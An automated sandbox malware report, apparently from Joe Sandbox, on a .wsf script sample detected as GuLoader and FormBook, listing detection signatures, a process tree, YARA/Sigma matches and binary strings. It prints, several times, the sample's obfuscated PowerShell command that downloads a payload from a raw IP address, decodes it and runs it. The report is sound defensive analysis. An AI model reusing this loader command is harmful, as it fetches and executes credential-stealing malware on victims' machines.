Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CDS AC 661171855-VN1 SOA.wsf

Overview

General Information

Sample name:CDS AC 661171855-VN1 SOA.wsf
Analysis ID:1432342
MD5:7700a37bbfb2243c94b721449cc69b7f
SHA1:bc4e02172bfd1b919672b7480a8ddc5ad439ce9a
SHA256:655de8d3db5fbb1b2c4a57bb403f01070bf044c9afe2c4d6f7f25c2c765d87f7
Tags:wsf
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2304 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CDS AC 661171855-VN1 SOA.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D$DTTr aDnFs,p,a tVr oHn,iNz eSdB)O ');Hydrolyzable (unkaiserlike ' $sgSl o bHa lM: DHe,cKeUnUtSrSaEl iUsTeFdf U=. C[ SSydsAt.e mV.,T e x.tS. EDnAc o d i n g ]C:S: A.S CII.IB.mGPe tSS,t.r.i n g (S$MU,n lba.i d )S ');Hydrolyzable (unkaiserlike 'v$pg.lBo b,a l,:CM,u s e.u mAiBs,e,=S$,D e,cCe,n t r,aPlEi.sRe d ..s uTbBsTt rIi,nCgG( 3.0E7C5.8 3O, 2,5B2 1.6D) ');Hydrolyzable $Museumise;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3804 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1364 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D$DTTr aDnFs,p,a tVr oHn,iNz eSdB)O ');Hydrolyzable (unkaiserlike ' $sgSl o bHa lM: DHe,cKeUnUtSrSaEl iUsTeFdf U=. C[ SSydsAt.e mV.,T e x.tS. EDnAc o d i n g ]C:S: A.S CII.IB.mGPe tSS,t.r.i n g (S$MU,n lba.i d )S ');Hydrolyzable (unkaiserlike 'v$pg.lBo b,a l,:CM,u s e.u mAiBs,e,=S$,D e,cCe,n t r,aPlEi.sRe d ..s uTbBsTt rIi,nCgG( 3.0E7C5.8 3O, 2,5B2 1.6D) ');Hydrolyzable $Museumise;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 6672 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 1436 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • qdSMStVpAfAXHdDEbm.exe (PID: 6444 cmdline: "C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • recover.exe (PID: 5052 cmdline: "C:\Windows\SysWOW64\recover.exe" MD5: D38B657A068016768CA9F3B5E100B472)
              • qdSMStVpAfAXHdDEbm.exe (PID: 6448 cmdline: "C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 5996 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wab.exe (PID: 5024 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 6472 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 1924 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a360:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1399f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a360:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1399f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries
        SourceRuleDescriptionAuthorStrings
        amsi64_7108.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xf1c3:$b2: ::FromBase64String(
        • 0xc551:$s1: -join
        • 0x5cfd:$s4: +=
        • 0x5dbf:$s4: +=
        • 0x9fe6:$s4: +=
        • 0xc103:$s4: +=
        • 0xc3ed:$s4: +=
        • 0xc533:$s4: +=
        • 0xe786:$s4: +=
        • 0xe806:$s4: +=
        • 0xe8cc:$s4: +=
        • 0xe94c:$s4: +=
        • 0xeb22:$s4: +=
        • 0xeba6:$s4: +=
        • 0xcc6f:$e4: Get-WmiObject
        • 0xce5e:$e4: Get-Process
        • 0xceb6:$e4: Start-Process
        amsi32_1364.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xf129:$b2: ::FromBase64String(
        • 0xc551:$s1: -join
        • 0x5cfd:$s4: +=
        • 0x5dbf:$s4: +=
        • 0x9fe6:$s4: +=
        • 0xc103:$s4: +=
        • 0xc3ed:$s4: +=
        • 0xc533:$s4: +=
        • 0xe786:$s4: +=
        • 0xe806:$s4: +=
        • 0xe8cc:$s4: +=
        • 0xe94c:$s4: +=
        • 0xeb22:$s4: +=
        • 0xeba6:$s4: +=
        • 0xcc6f:$e4: Get-WmiObject
        • 0xce5e:$e4: Get-Process
        • 0xceb6:$e4: Start-Process
        • 0x15d94:$e4: Get-Process

        System Summary

        barindex
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe" , CommandLine: "C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe, NewProcessName: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe, OriginalFileName: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1436, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe" , ProcessId: 6444, ProcessName: qdSMStVpAfAXHdDEbm.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\windows mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\recover.exe, ProcessId: 5052, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\T61TH2R0
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CDS AC 661171855-VN1 SOA.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CDS AC 661171855-VN1 SOA.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CDS AC 661171855-VN1 SOA.wsf", ProcessId: 2304, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D$DTTr aDnFs,p,a tVr oHn,iNz eSdB)O ');Hydrolyzable (unkaise
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Source: Yara matchFile source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Binary string: ws\System.Core.pdbAP source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: recover.pdb source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3357478857.000000000019E000.00000002.00000001.01000000.00000007.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3357480390.000000000019E000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbR*\ source: powershell.exe, 00000005.00000002.2455567320.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: recover.pdbGCTL source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: tem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: stem.Core.pdb/ source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
